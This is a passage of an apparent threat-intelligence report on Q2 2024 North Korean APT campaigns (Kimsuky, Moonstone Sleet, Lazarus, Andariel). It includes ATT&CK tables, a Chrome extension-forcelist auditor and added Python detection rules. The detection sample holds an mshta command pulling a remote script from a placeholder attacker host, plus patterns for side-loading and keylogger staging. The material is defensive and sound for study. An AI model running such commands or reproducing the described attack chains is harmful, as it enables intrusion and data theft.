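"2"="ponmlkjihgfedcbaponmlkjihgfedcba;https://raw.githubusercontent.com/example-org/example-repo/main/update.xml"
"3"="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"
"""


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal parser for REG_SZ values in a .reg text export: {key path: {name: value}}."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            m = re.match(r'^"([^"]+)"="(.*)"$', line)
            if m:
                # .reg escapes backslashes as \\ inside string values
                keys[current][m.group(1)] = m.group(2).replace("\\\\", "\\")
    return keys


def audit_forcelist(text: str) -> List[Dict[str, str]]:
    """Return one finding per forced extension that fails a check; empty list if all pass."""
    findings: List[Dict[str, str]] = []
    for name, value in parse_reg_export(text).get(FORCELIST_KEY, {}).items():
        # Policy value format is "<extension id>;<update url>"; the URL part is optional
        # and defaults to the Web Store when absent.
        ext_id, _, update_url = value.partition(";")
        problems = []
        if not EXTENSION_ID_RE.match(ext_id):
            problems.append("malformed extension id")
        if ext_id not in APPROVED_IDS:
            problems.append("not on approved list")
        if update_url:
            host = urlparse(update_url).hostname or ""
            if host != WEB_STORE_UPDATE_HOST:
                problems.append(f"non-store update URL host {host}")
        if problems:
            findings.append({"value": name, "id": ext_id, "problems": "; ".join(problems)})
    return findings


if __name__ == "__main__":
    for f in audit_forcelist(SAMPLE_EXPORT):
        print(f"value {f['value']}: {f['id']} -> {f['problems']}")
```

On a live host, feed the function the decoded output of `reg export "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist" out.reg`; an unexpected forced entry is the artefact the PowerShell step in this campaign would leave behind.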
MITRE ATT&CK Techniques

Tactics              ID          Techniques
Execution            T1059.001   Command and Scripting Interpreter: PowerShell
Persistence          T1176       Browser Extensions
Credential Access    T1555.003   Credentials from Password Stores: Credentials from Web Browsers
Collection           T1113       Screen Capture
Command and Control  T1071.001   Application Layer Protocol: Web Protocols
Command and Control  T1102.001   Web Service: Dead Drop Resolver
Exfiltration         T1041       Exfiltration Over C2 Channel

In Q2 2024, researchers found that Kimsuky exploited the MS Office Equation Editor vulnerability (CVE-2017-11882) to distribute a keylogger. The keylogger was delivered via an embedded malicious script executed by mshta.exe, which connected to a URL hosting the script disguised as an error page. The script downloaded additional malware, created a file named desktop.ini.bak to store keylogging and clipboard data, and attempted to register itself in the Windows registry to run at startup. Despite a coding error preventing registry registration, the keylogger collected and sent data to the command-and-control server before deletion and recreation.

MITRE ATT&CK Techniques

Tactics            ID          Techniques/Sub Techniques
Initial Access     T1190       Exploit Public-Facing Application
Persistence        T1547.001   Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion    T1027       Obfuscated Files or Information
Credential Access  T1056       Input Capture
Collection         T1005       Data from Local System
Exfiltration       T1041       Exfiltration Over C2 Channel

MOONSTONE SLEET

At the beginning of Q2 2024, researchers identified a new North Korean threat actor, Moonstone Sleet (also tracked as Storm-1789), which employs both established and unique attack methodologies for financial and cyberespionage objectives. This group sets up fake companies and job opportunities to engage targets, uses trojanized legitimate tools, creates a malicious game, and deploys custom ransomware.
Moonstone Sleet, initially overlapping with Diamond Sleet, now operates with its own infrastructure and attack methods. Notable tactics include delivering trojanized PuTTY via social media and freelancing platforms, using malicious npm packages, and creating fake companies like StarGlow Ventures and C.C. Waterfall. The group has developed a malicious tank game, DeTankWar, and a ransomware variant, FakePenny, to target companies. Moonstone Sleet’s operations indicate a well-resourced actor with capabilities inherited from prior North Korean cyber operations, suggesting a strategic alignment with North Korean cyber objectives.

MITRE ATT&CK Techniques

Tactics               ID          Techniques
Execution             T1129       Shared Modules
Persistence           T1574.002   Hijack Execution Flow: DLL Side-Loading
Privilege Escalation  T1574.002   Hijack Execution Flow: DLL Side-Loading
Defense Evasion       T1027       Obfuscated Files or Information
Defense Evasion       T1574.002   Hijack Execution Flow: DLL Side-Loading
Discovery             T1082       System Information Discovery
Discovery             T1083       File and Directory Discovery
Command and Control   T1071       Application Layer Protocol
Impact                T1486       Data Encrypted for Impact

LAZARUS

By the beginning of Q2 2024, researchers discovered that the North Korea-linked Lazarus Group had used fake job lures to deliver the new Kaolin RAT in attacks on individuals in Asia in the summer of 2023. The Kaolin RAT, which can change file timestamps and load DLL binaries from command-and-control (C2) servers, also serves as a conduit for the FudModule rootkit. This rootkit exploits a patched vulnerability in the appid.sys driver (CVE-2024-21338, CVSS 7.8) to disable security mechanisms.
Lazarus’s Operation Dream Job campaign uses social media and instant messaging platforms to trick targets into launching malicious ISO files containing a renamed Windows application, “AmazonVNC.exe”, that side-loads “version.dll” and injects a payload from “aws.cfg”. This payload downloads shellcode from a compromised Italian company website, launching RollFling and subsequently RollSling, which loads RollMid. RollMid establishes C2 communication through a three-step process involving HTML files, PNG images with steganography, and Base64-encoded data blobs, ultimately fetching the Kaolin RAT. The malware enumerates files, performs file operations, uploads to C2, alters timestamps, manages processes, executes commands, and connects to hosts. Lazarus’s complex and evolving attack chain demonstrates significant resource investment and innovation, posing a substantial challenge to cybersecurity defenses.

MITRE ATT&CK Techniques

Tactics              ID      Techniques
Initial Access       T1566   Phishing
Execution            T1059   Command and Scripting Interpreter
Persistence          T1547   Registry Run Keys / Startup Folder
Defense Evasion      T1027   Obfuscated Files or Information
Defense Evasion      T1036   Masquerading
Defense Evasion      T1497   Virtualization/Sandbox Evasion
Discovery            T1082   System Information Discovery
Discovery            T1083   File and Directory Discovery
Collection           T1005   Data from Local System
Command and Control  T1071   Application Layer Protocol
Exfiltration         T1041   Exfiltration Over C2 Channel

ANDARIEL

Researchers identified new Andariel APT attack campaigns targeting Korean corporations in Q2 of 2024. These attacks employed a variety of malware tools, including keyloggers, infostealers, and proxy tools alongside backdoors, aimed at gaining control of and exfiltrating data from compromised systems.
Notably, Nestdoor, a persistent RAT malware, featured prominently in these campaigns, leveraging tactics such as exploiting the Log4Shell vulnerability in VMware Horizon and disguising itself as legitimate software like OpenVPN to maintain persistence through task scheduling and command-and-control (C&C) server communication. Recently, Andariel has also introduced a new malware strain, Dora RAT, developed in Go, supporting basic functionalities like reverse shell and file operations, sometimes signed with valid certificates to evade detection. In addition to direct attacks, the group has been observed using proxy tools akin to those previously linked to Lazarus Group activities, underscoring their sophistication and adaptation of tactics over time.

MITRE ATT&CK Techniques

Tactics              ID          Techniques/Sub Techniques
Initial Access       T1566       Phishing
Execution            T1129       Shared Modules
Defense Evasion      T1027.005   Obfuscated Files or Information: Indicator Removal from Tools
Credential Access    T1056.001   Input Capture: Keylogging
Discovery            T1082       System Information Discovery
Discovery            T1083       File and Directory Discovery
Discovery            T1518.001   Software Discovery: Security Software Discovery
Collection           T1056.001   Input Capture: Keylogging
Collection           T1115       Clipboard Data
Command and Control  T1071       Application Layer Protocol

CONCLUSION

In Q2 2024, the APT landscape showcased intensified efforts by Iranian, Russian, Chinese, and North Korean cyber actors. These groups have demonstrated advanced capabilities and strategic intent across various regions and sectors, emphasizing the critical need for heightened cybersecurity measures. To mitigate these evolving threats, it is imperative for organizations to prioritize continuous monitoring, robust defense mechanisms, and comprehensive user education, ensuring proactive and adaptive responses to protect against the diverse and dynamic landscape of cyber espionage and cybercrime.
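The continuous monitoring the conclusion calls for can start from the chains this report describes. The following Python is an added example, not from cyfirma: it runs simple detection logic over constructed Sysmon-style events for the Kimsuky Equation Editor case (the Equation Editor process spawning mshta.exe with a remote URL, and the desktop.ini.bak staging file) and the Lazarus AmazonVNC.exe case (a system DLL name such as version.dll loaded from outside the Windows directory). The EQNEDT32.EXE process name is an assumption not stated on the page, and all paths, hostnames and events are placeholders.

```python
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (not real telemetry); paths and hosts are placeholders.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate",
     "parent": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://ATTACKER-PLACEHOLDER.example/error.html"},
    {"type": "ProcessCreate", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe", "cmdline": r"mshta.exe C:\Users\u\help.hta"},
    {"type": "FileCreate", "target": r"C:\Users\u\AppData\Local\Temp\desktop.ini.bak"},
    {"type": "ImageLoad", "image": r"D:\AmazonVNC.exe", "loaded": r"D:\version.dll"},
    {"type": "ImageLoad", "image": r"C:\Windows\System32\notepad.exe",
     "loaded": r"C:\Windows\System32\version.dll"},
]

# DLL names the Lazarus chain side-loads; the legitimate copies live under the Windows directory.
SYSTEM_DLLS = {"version.dll"}
WINDOWS_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")

def base(path):
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()

def detect(events):
    """Return (rule_name, event) pairs for the report's chains found in the events."""
    hits = []
    for ev in events:
        if ev["type"] == "ProcessCreate":
            # Equation Editor has no business launching a script host that fetches a remote URL.
            if (base(ev["parent"]) == "eqnedt32.exe" and base(ev["image"]) == "mshta.exe"
                    and "http" in ev["cmdline"].lower()):
                hits.append(("equation_editor_spawns_mshta_remote", ev))
        elif ev["type"] == "FileCreate":
            # Staging file the keylogger writes keystrokes and clipboard data into.
            if base(ev["target"]) == "desktop.ini.bak":
                hits.append(("keylogger_staging_desktop_ini_bak", ev))
        elif ev["type"] == "ImageLoad":
            folder = str(PureWindowsPath(ev["loaded"]).parent).lower()
            # A system DLL name resolved from outside the Windows directory is the side-load tell.
            if base(ev["loaded"]) in SYSTEM_DLLS and not folder.startswith(WINDOWS_DIRS):
                hits.append(("system_dll_loaded_outside_windows_dir", ev))
    return hits

if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(rule, ev.get("image", ev.get("target")))
```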